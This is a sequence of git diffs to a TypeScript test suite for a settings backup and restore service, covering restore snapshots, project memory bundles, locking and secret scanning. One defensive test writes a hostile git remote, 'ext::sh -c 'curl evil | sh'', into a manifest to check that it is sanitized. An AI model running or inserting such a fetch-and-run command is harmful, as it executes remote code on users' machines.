     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -923,6 +933,8 @@ describe("backup adapters", () => {
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -1117,6 +1129,8 @@ describe("backup adapters", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
 
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("backed up\n");
@@ -1156,6 +1170,8 @@ describe("backup adapters", () => {
         repositoryRoot: repository.rootDir,
         managedPath: settings.path,
         includeProjects: false,
+        snapshotPath: path.join(tempDir, "restore-snapshot"),
+        matchedProjectPaths: [],
       });
       throw new Error("Expected the lost preferences write to be reported");
     } catch (error) {
@@ -1192,6 +1208,8 @@ describe("backup adapters", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
 
     expect(config.state.userPreferences?.appearance?.theme).toBe("dark");
@@ -1208,7 +1226,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
     const snapshotRoot = path.join(tempDir, "snapshot");
 
-    await payload.writeSafetySnapshot(snapshotRoot, { includeProjectMemory: false });
+    await payload.writeSafetySnapshot(snapshotRoot);
 
     expect(await fs.readFile(path.join(snapshotRoot, "AGENTS.md"), "utf-8")).toBe(
       "before restore\n"
@@ -1233,7 +1251,7 @@ describe("backup adapters", () => {
     // snapshot is unredacted, so anything wider than the owner leaks MCP credentials.
     const previousUmask = process.umask(0o022);
     try {
-      await payload.writeSafetySnapshot(snapshotRoot, { includeProjectMemory: false });
+      await payload.writeSafetySnapshot(snapshotRoot);
     } finally {
       process.umask(previousUmask);
     }
@@ -1284,7 +1302,7 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
     const snapshotRoot = path.join(tempDir, "case-snapshot");
 
-    await payload.writeSafetySnapshot(snapshotRoot, { includeProjectMemory: false });
+    await payload.writeSafetySnapshot(snapshotRoot);
 
     expect(await fs.readFile(path.join(snapshotRoot, "skills/demo/Foo.md"), "utf-8")).toBe(
       "upper\n"
@@ -1503,14 +1521,59 @@ describe("backup adapters project bundle", () => {
     expect(preview.projectBundleSkipped).toBe(false);
     expect(preview.changes).toContainEqual({ status: "M", path: memoryPath });
 
-    const restored = await payload.restore({
+    const validated = await payload.validateRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       includeProjects: true,
     });
+    expect(validated.matchedProjectPaths).toEqual([project]);
+
+    const snapshotPath = path.join(tempDir, "restore-snapshot");
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+      snapshotPath,
+      matchedProjectPaths: validated.matchedProjectPaths,
+    });
     expect(restored.changedFiles).toContain(memoryPath);
+    expect(restored.restoredProjectMemory).toEqual([{ projectPath: project, files: [memoryPath] }]);
     expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
       "backup version\n"
+    );
+    // The overwritten local edit is recoverable from the snapshot the restore took itself.
+    expect(
+      await fs.readFile(
+        path.join(snapshotPath, "project-bundle", ...memoryPath.split("/")),
+        "utf-8"
+      )
+    ).toBe("local edit\n");
+  });
+
+  it("does not overwrite a project that became matched only after validation", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryPath = `memory/project/${projectMemoryDirName(project)}/notes.md`;
+
+    const { repository, payload } = await exportBundle();
+    await seedProjectMemory(project, "notes.md", "local edit\n");
+
+    // Validation classified nothing as matched (as if the project was registered by another
+    // window afterwards); the recomputed plan now matches it, but the snapshot never
+    // covered it, so the restore must leave it alone.
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
+    });
+    expect(restored.changedFiles).not.toContain(memoryPath);
+    expect(restored.restoredProjectMemory).toEqual([]);
+    expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
+      "local edit\n"
     );
   });
 
@@ -1555,6 +1618,8 @@ describe("backup adapters project bundle", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       includeProjects: true,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles.some((file) => file.startsWith("memory/project"))).toBe(false);
     expect(
@@ -1563,6 +1628,36 @@ describe("backup adapters project bundle", () => {
         () => false
       )
     ).toBe(false);
+  });
+
+  it("re-sanitizes a repository-controlled remote before presenting a candidate", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const { repository, payload } = await exportBundle();
+    config.state.projects.delete(project);
+
+    // Export sanitized the remote; a crafted checkout swaps in an executable one.
+    const manifestPath = path.join(
+      repository.rootDir,
+      settings.path,
+      "project-bundle",
+      "manifest.json"
+    );
+    const manifest = JSON.parse(await fs.readFile(manifestPath, "utf-8")) as {
+      projects: Array<{ gitRemote?: string }>;
+    };
+    manifest.projects[0].gitRemote = "ext::sh -c 'curl evil | sh'";
+    await fs.writeFile(manifestPath, JSON.stringify(manifest), "utf-8");
+
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(preview.projectImports).toHaveLength(1);
+    expect(preview.projectImports[0]?.gitRemote).toBeUndefined();
   });
 
   it("imports approved project memory re-keyed to the target path, add-only", async () => {
@@ -1634,6 +1729,8 @@ describe("backup adapters project bundle", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.projectBundleSkipped).toBe(true);
 
@@ -1647,32 +1744,42 @@ describe("backup adapters project bundle", () => {
     expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
   });
 
-  it("covers registered project memory in the safety snapshot only when asked", async () => {
-    const project = path.join(tempDir, "projects", "alpha");
-    registerProject(project);
-    await seedProjectMemory(project, "notes.md", "before restore\n");
+  it("snapshots only the matched project memory a restore can overwrite", async () => {
+    const matchedProject = path.join(tempDir, "projects", "alpha");
+    registerProject(matchedProject);
+    await seedProjectMemory(matchedProject, "notes.md", "backup version\n");
     await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
-    const payload = createBackupPayloadStore({ config });
+    const { repository, payload } = await exportBundle();
 
-    const withProjects = path.join(tempDir, "snapshot-with");
-    await payload.writeSafetySnapshot(withProjects, { includeProjectMemory: true });
-    const snapshotFile = path.join(
-      withProjects,
-      "project-bundle",
-      "memory",
-      "project",
-      projectMemoryDirName(project),
-      "notes.md"
-    );
-    expect(await fs.readFile(snapshotFile, "utf-8")).toBe("before restore\n");
+    // Registered here but absent from the backup: nothing can overwrite its memory, so it
+    // must neither appear in the snapshot nor count against the bundle limits.
+    const unrelatedProject = path.join(tempDir, "projects", "beta");
+    registerProject(unrelatedProject);
+    await seedProjectMemory(unrelatedProject, "local.md", "local only\n");
+    await seedProjectMemory(matchedProject, "notes.md", "local edit\n");
 
-    const withoutProjects = path.join(tempDir, "snapshot-without");
-    await payload.writeSafetySnapshot(withoutProjects, { includeProjectMemory: false });
+    const snapshotPath = path.join(tempDir, "restore-snapshot");
+    await payload.writeSafetySnapshot(snapshotPath);
     expect(
-      await fs.stat(path.join(withoutProjects, "project-bundle")).then(
+      await fs.stat(path.join(snapshotPath, "project-bundle")).then(
         () => true,
         () => false
       )
     ).toBe(false);
+
+    await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+      snapshotPath,
+      matchedProjectPaths: [matchedProject],
+    });
+    const snapshotBundle = JSON.parse(
+      await fs.readFile(path.join(snapshotPath, "project-bundle", "manifest.json"), "utf-8")
+    ) as { projects: Array<{ path: string }>; files: Array<{ path: string }> };
+    expect(snapshotBundle.projects.map((entry) => entry.path)).toEqual([matchedProject]);
+    expect(snapshotBundle.files.map((file) => file.path)).toEqual([
+      `memory/project/${projectMemoryDirName(matchedProject)}/notes.md`,
+    ]);
   });
 });

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1523,14 +1523,18 @@ describe("backup adapters project bundle", () => {
     const repository = await gitRepo.prepare(settings);
 
     // Remotes are discovered outside the registration lock; the listing waits for it. While
-    // it waits, the project is removed and another checkout registered at the same path.
+    // it waits, the project is removed and another checkout registered at the same path with
+    // the very same config — indistinguishable in the registry's content, so the write
+    // itself (the test double keeps the registry in memory; a real Config rewrites the file
+    // on every save) is what has to be seen.
     const held = Promise.withResolvers<void>();
     const lockAcquired = Promise.withResolvers<void>();
     const holding = withProjectRegistrationLock(muxRoot, async () => {
       lockAcquired.resolve();
       await held.promise;
       config.state.projects.delete(project);
-      config.state.projects.set(project, { workspaces: [], displayName: "replacement" });
+      config.state.projects.set(project, { workspaces: [] });
+      await fs.writeFile(path.join(muxRoot, "config.json"), "{}\n", "utf-8");
     });
     await lockAcquired.promise;
     const exporting = payload.exportTo({
@@ -1548,12 +1552,10 @@ describe("backup adapters project bundle", () => {
         path.join(repository.rootDir, settings.path, "project-bundle", "manifest.json"),
         "utf-8"
       )
-    ) as { projects: Array<{ path: string; name: string; gitRemote?: string }> };
+    ) as { projects: Array<{ path: string; gitRemote?: string }> };
     // The entry is the new registration's; the removed project's remote does not travel
     // with it.
-    expect(
-      manifest.projects.map(({ path: entryPath, name }) => ({ path: entryPath, name }))
-    ).toEqual([{ path: project, name: "replacement" }]);
+    expect(manifest.projects.map((entry) => entry.path)).toEqual([project]);
     expect(manifest.projects[0]?.gitRemote).toBeUndefined();
   });
 

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1518,6 +1518,10 @@ describe("backup adapters project bundle", () => {
     await runGit(["-C", project, "init"]);
     await runGit(["-C", project, "remote", "add", "origin", "git@github.com:dev/old.git"]);
     registerProject(project);
+    // The test double keeps the registry in memory; a real Config stamps a fresh writeId into
+    // the file on every save. Modelled here by hand, with two files of the same size, so the
+    // stamp alone is what distinguishes the writes.
+    await fs.writeFile(path.join(muxRoot, "config.json"), '{"writeId":"before"}\n', "utf-8");
     const payload = createBackupPayloadStore({ config });
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const repository = await gitRepo.prepare(settings);
@@ -1525,8 +1529,7 @@ describe("backup adapters project bundle", () => {
     // Remotes are discovered outside the registration lock; the listing waits for it. While
     // it waits, the project is removed and another checkout registered at the same path with
     // the very same config — indistinguishable in the registry's content, so the write
-    // itself (the test double keeps the registry in memory; a real Config rewrites the file
-    // on every save) is what has to be seen.
+    // itself is what has to be seen.
     const held = Promise.withResolvers<void>();
     const lockAcquired = Promise.withResolvers<void>();
     const holding = withProjectRegistrationLock(muxRoot, async () => {
@@ -1534,7 +1537,7 @@ describe("backup adapters project bundle", () => {
       await held.promise;
       config.state.projects.delete(project);
       config.state.projects.set(project, { workspaces: [] });
-      await fs.writeFile(path.join(muxRoot, "config.json"), "{}\n", "utf-8");
+      await fs.writeFile(path.join(muxRoot, "config.json"), '{"writeId":"after-"}\n', "utf-8");
     });
     await lockAcquired.promise;
     const exporting = payload.exportTo({

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -17,6 +17,7 @@ import { projectMemoryDirName } from "@/node/services/memoryService";
 import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
 import {
   memoryMutationLockKey,
+  withProjectRegistrationLock,
   withTargetMutationLock,
 } from "@/node/services/refinement/targetMutationLocks";
 import { TestBackupConfig, captureRejection, runGit, writeFixtureFile } from "./testHelpers";
@@ -2204,6 +2205,54 @@ describe("backup adapters project bundle", () => {
       { projectPath: targetPath, files: [localPath] },
     ]);
     expect(await fs.readFile(path.join(muxRoot, ...localPath.split("/")), "utf-8")).toBe("v2\n");
+  });
+
+  it("holds project unregistration off while matched memory is written", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryPath = `memory/project/${projectMemoryDirName(project)}/notes.md`;
+    const { repository, payload } = await exportBundle();
+    await seedProjectMemory(project, "notes.md", "local edit\n");
+
+    // The lock `ProjectService.remove` takes: while a removal holds it, the restore must
+    // not read registration and write, and once the restore holds it a removal cannot
+    // land between its registration read and its memory write.
+    const held = Promise.withResolvers<void>();
+    const lockAcquired = Promise.withResolvers<void>();
+    const holding = withProjectRegistrationLock(muxRoot, async () => {
+      lockAcquired.resolve();
+      await held.promise;
+    });
+    await lockAcquired.promise;
+
+    const progress = { restored: false };
+    const restoring = payload
+      .restore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+        snapshotPath: path.join(tempDir, "restore-snapshot"),
+        matchedProjects: [matchedAt(project)],
+      })
+      .then((result) => {
+        progress.restored = true;
+        return result;
+      });
+    await new Promise((resolve) => setTimeout(resolve, 100));
+    expect(progress.restored).toBe(false);
+    expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
+      "local edit\n"
+    );
+
+    held.resolve();
+    await holding;
+    const restored = await restoring;
+    expect(restored.changedFiles).toContain(memoryPath);
+    expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
+      "backup version\n"
+    );
   });
 
   it("re-reads origin markers at the write boundary, inside the memory lock", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -6,7 +6,12 @@ import * as path from "node:path";
 import type { SettingsBackupInput } from "@/common/orpc/schemas/backup";
 import { createBackupGitRepo, createBackupPayloadStore } from "./adapters";
 import { BackupNonFastForwardError, backupCachePath } from "./gitRepo";
-import { MAX_BACKUP_FILE_BYTES, MAX_BACKUP_FILE_COUNT, ProjectMemoryRestoreError } from "./payload";
+import {
+  MAX_BACKUP_FILE_BYTES,
+  MAX_BACKUP_FILE_COUNT,
+  ProjectMemoryRestoreError,
+  ProjectMemoryWriteError,
+} from "./payload";
 import { MEMORY_MAX_FILE_BYTES } from "@/common/constants/memory";
 import { projectMemoryDirName } from "@/node/services/memoryService";
 import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
@@ -2032,6 +2037,42 @@ describe("backup adapters project bundle", () => {
     expect(
       await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "conflict.md"), "utf-8")
     ).toBe("local wins\n");
+  });
+
+  it("keeps reporting written files when the origin marker cannot be written", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const { repository, payload } = await exportBundle();
+    config.state.projects.delete(project);
+    await fs.rm(path.join(muxRoot, "memory", "project", projectMemoryDirName(project)), {
+      recursive: true,
+      force: true,
+    });
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    const targetPath = path.join(tempDir, "projects", "alpha-moved");
+    const targetDir = projectMemoryDirName(targetPath);
+    // A directory squats on the marker's name, so the marker write fails after the notes landed.
+    await fs.mkdir(path.join(muxRoot, "memory", "project", targetDir, ".backup-origin.json"), {
+      recursive: true,
+    });
+
+    const importer = await payload.prepareProjectImports({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+    });
+    const error = await captureRejection(
+      importer.importProjectMemory({ token: preview.projectImports[0].token, targetPath })
+    );
+    expect(error).toBeInstanceOf(ProjectMemoryWriteError);
+    expect((error as ProjectMemoryWriteError).written).toEqual([
+      `memory/project/${targetDir}/notes.md`,
+    ]);
   });
 
   it("updates an imported project's memory on later restores instead of re-offering it", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1793,12 +1793,11 @@ describe("backup adapters project bundle", () => {
     const targetDir = projectMemoryDirName(targetPath);
     await writeFixtureFile(muxRoot, `memory/project/${targetDir}/conflict.md`, "local wins\n");
 
-    const imported = await payload.importProjectMemory({
+    const importer = await payload.prepareProjectImports({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
-      token,
-      targetPath,
     });
+    const imported = await importer.importProjectMemory({ token, targetPath });
 
     expect(imported.writtenFiles).toEqual([`memory/project/${targetDir}/notes.md`]);
     expect(imported.skippedFiles).toEqual([`memory/project/${targetDir}/conflict.md`]);

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1656,6 +1656,33 @@ describe("backup adapters project bundle", () => {
     ).toBe("local edit\n");
   });
 
+  it("previews matched memory without reading unrelated local-only notes", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const memoryDir = projectMemoryDirName(project);
+    const { repository, payload } = await exportBundle();
+
+    // Past the backup file budget and never restored: a whole-directory read would fail
+    // the preview and lose the restore half with it.
+    await fs.writeFile(
+      path.join(muxRoot, "memory", "project", memoryDir, "huge-local.md"),
+      Buffer.alloc(MAX_BACKUP_FILE_BYTES + 1, "x")
+    );
+    await seedProjectMemory(project, "notes.md", "local edit\n");
+
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(preview.changes).toContainEqual({
+      status: "M",
+      path: `memory/project/${memoryDir}/notes.md`,
+    });
+  });
+
   it("refuses a matched entry that would break memory limits before the core restore", async () => {
     const project = path.join(tempDir, "projects", "alpha");
     registerProject(project);

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -6,7 +6,7 @@ import * as path from "node:path";
 import type { SettingsBackupInput } from "@/common/orpc/schemas/backup";
 import { createBackupGitRepo, createBackupPayloadStore } from "./adapters";
 import { BackupNonFastForwardError, backupCachePath } from "./gitRepo";
-import { ProjectMemoryRestoreError } from "./payload";
+import { MAX_BACKUP_FILE_COUNT, ProjectMemoryRestoreError } from "./payload";
 import { projectMemoryDirName } from "@/node/services/memoryService";
 import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
 import {
@@ -1472,6 +1472,66 @@ describe("backup adapters project bundle", () => {
     expect(byPath.get(plainProject)?.gitRemote).toBe("git@github.com:dev/plain.git");
     expect(byPath.get(credentialedProject)?.gitRemote).toBeUndefined();
   });
+
+  it("flags a token published through a project remote's path in the secret scan", async () => {
+    const project = path.join(tempDir, "projects", "leaky");
+    await fs.mkdir(project, { recursive: true });
+    await runGit(["-C", project, "init"]);
+    // Not userinfo, so the URL credential sanitizer keeps it; the pattern scan must catch it.
+    await runGit([
+      "-C",
+      project,
+      "remote",
+      "add",
+      "origin",
+      `https://example.com/ghp_${"a".repeat(24)}/repo.git`,
+    ]);
+    registerProject(project);
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const payload = createBackupPayloadStore({ config });
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const repository = await gitRepo.prepare(settings);
+
+    const exported = await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+
+    expect(exported.secretFiles).toEqual(["project-bundle/manifest.json"]);
+    expect(exported.secretApproval).not.toBe("");
+  });
+
+  it("refuses an export whose core and bundle halves exceed the combined tree limits", async () => {
+    // Each half stays under the per-payload file count (and each project under the memory
+    // scope cap); together they exceed the single limit the checkout applies.
+    const half = Math.ceil(MAX_BACKUP_FILE_COUNT / 2);
+    const perProject = Math.ceil(half / 3);
+    const fixtures: Array<[string, string]> = [];
+    for (let index = 0; index < half; index += 1) {
+      fixtures.push([`skills/bulk/s${index}.md`, "skill\n"]);
+    }
+    for (const name of ["alpha", "beta", "gamma"]) {
+      const project = path.join(tempDir, "projects", name);
+      registerProject(project);
+      for (let index = 0; index < perProject; index += 1) {
+        fixtures.push([`memory/project/${projectMemoryDirName(project)}/m${index}.md`, "note\n"]);
+      }
+    }
+    await Promise.all(fixtures.map(([file, content]) => writeFixtureFile(muxRoot, file, content)));
+    const payload = createBackupPayloadStore({ config });
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const repository = await gitRepo.prepare(settings);
+
+    const error = await captureRejection(
+      payload.exportTo({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+      })
+    );
+    expect((error as Error).message).toContain(`${MAX_BACKUP_FILE_COUNT}`);
+  }, 30_000);
 
   it("removes a previously pushed bundle when the toggle is disabled", async () => {
     const project = path.join(tempDir, "projects", "alpha");

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1683,6 +1683,35 @@ describe("backup adapters project bundle", () => {
     });
   });
 
+  it("refuses a matched destination it could not snapshot before the core restore", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "backup instructions\n");
+    const memoryDir = projectMemoryDirName(project);
+    const { repository, payload } = await exportBundle();
+
+    // The local file at the incoming path grew past the backup file budget: the recovery
+    // copy cannot hold it, so overwriting it must be refused — and refused up front.
+    await fs.writeFile(
+      path.join(muxRoot, "memory", "project", memoryDir, "notes.md"),
+      Buffer.alloc(MAX_BACKUP_FILE_BYTES + 1, "x")
+    );
+    await writeFixtureFile(muxRoot, "AGENTS.md", "local instructions\n");
+
+    const error = await captureRejection(
+      payload.validateRestore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+      })
+    );
+    expect((error as Error).message).toContain("notes.md");
+    expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
+      "local instructions\n"
+    );
+  });
+
   it("refuses a matched entry that would break memory limits before the core restore", async () => {
     const project = path.join(tempDir, "projects", "alpha");
     registerProject(project);

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -17,9 +17,9 @@ import { projectMemoryDirName } from "@/node/services/memoryService";
 import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
 import {
   memoryMutationLockKey,
-  withProjectRegistrationLock,
   withTargetMutationLock,
 } from "@/node/services/refinement/targetMutationLocks";
+import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
 import { TestBackupConfig, captureRejection, runGit, writeFixtureFile } from "./testHelpers";
 
 describe("backup adapters", () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -6,7 +6,8 @@ import * as path from "node:path";
 import type { SettingsBackupInput } from "@/common/orpc/schemas/backup";
 import { createBackupGitRepo, createBackupPayloadStore } from "./adapters";
 import { BackupNonFastForwardError, backupCachePath } from "./gitRepo";
-import { TestBackupConfig, runGit, writeFixtureFile } from "./testHelpers";
+import { projectMemoryDirName } from "@/node/services/memoryService";
+import { TestBackupConfig, captureRejection, runGit, writeFixtureFile } from "./testHelpers";
 
 describe("backup adapters", () => {
   let tempDir: string;
@@ -40,7 +41,11 @@ describe("backup adapters", () => {
     const repository = await gitRepo.prepare(settings);
     expect(repository.remoteCommit).toBeNull();
 
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     const changes = await gitRepo.getPushChanges(repository);
     expect(changes.map((change) => change.path)).toContain("mux/AGENTS.md");
 
@@ -54,7 +59,11 @@ describe("backup adapters", () => {
     );
 
     const second = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: second.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     const unchanged = await gitRepo.commitAndPush(second, {
       message: "Back up Xum settings",
       expectedRemoteCommit: second.remoteCommit,
@@ -87,7 +96,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const repository = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(repository, {
       message: "Back up Xum settings",
       expectedRemoteCommit: repository.remoteCommit,
@@ -121,7 +134,11 @@ describe("backup adapters", () => {
 
     // A preview writes the payload into the cache but never pushes it.
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: first.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     const second = await gitRepo.prepare(settings);
     const preview = await payload.previewRestore({
@@ -138,7 +155,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const prepared = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: prepared.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: prepared.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     // Without the preflight this reads as a plain addition, and the restore the user accepts
     // then fails on the same unchanged filesystem state.
@@ -146,7 +167,11 @@ describe("backup adapters", () => {
     await fs.mkdir(path.join(muxRoot, "agents/foo.md"), { recursive: true });
 
     const refused = await payload
-      .previewRestore({ repositoryRoot: prepared.rootDir, managedPath: settings.path, includeProjects: false })
+      .previewRestore({
+        repositoryRoot: prepared.rootDir,
+        managedPath: settings.path,
+        includeProjects: false,
+      })
       .then(
         () => null,
         (error: unknown) => error
@@ -161,14 +186,22 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: first.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
     });
 
     const second = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: second.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     expect(await gitRepo.getPushChanges(second)).toEqual([]);
 
     // Another client advances the branch after this cache fetched it.
@@ -206,7 +239,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: first.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
@@ -215,7 +252,11 @@ describe("backup adapters", () => {
     // A preview rewrites the tracked payload in the cache without pushing it.
     await writeFixtureFile(muxRoot, "AGENTS.md", "local only\n");
     const second = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: second.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: second.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
 
     const third = await gitRepo.prepare(settings);
     const preview = await payload.previewRestore({
@@ -233,7 +274,11 @@ describe("backup adapters", () => {
     const gitRepo = createBackupGitRepo({ cacheRoot });
     const payload = createBackupPayloadStore({ config });
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
+      repositoryRoot: first.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
     await gitRepo.commitAndPush(first, {
       message: "Back up Xum settings",
       expectedRemoteCommit: first.remoteCommit,
@@ -341,7 +386,11 @@ describe("backup adapters", () => {
     const previousUmask = process.umask(0o022);
     try {
       const repository = await gitRepo.prepare(settings);
-      await payload.exportTo({ repositoryRoot: repository.rootDir, managedPath: settings.path, includeProjects: false });
+      await payload.exportTo({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: false,
+      });
     } finally {
       process.umask(previousUmask);
     }
@@ -476,7 +525,11 @@ describe("backup adapters", () => {
     const payload = createBackupPayloadStore({ config });
 
     const first = await gitRepo.prepare(settings);
-    await payload.exportTo({ repositoryRoot: first.rootDir, managedPath: settings.path, includeProjects: false });
+    await payload.exportTo({
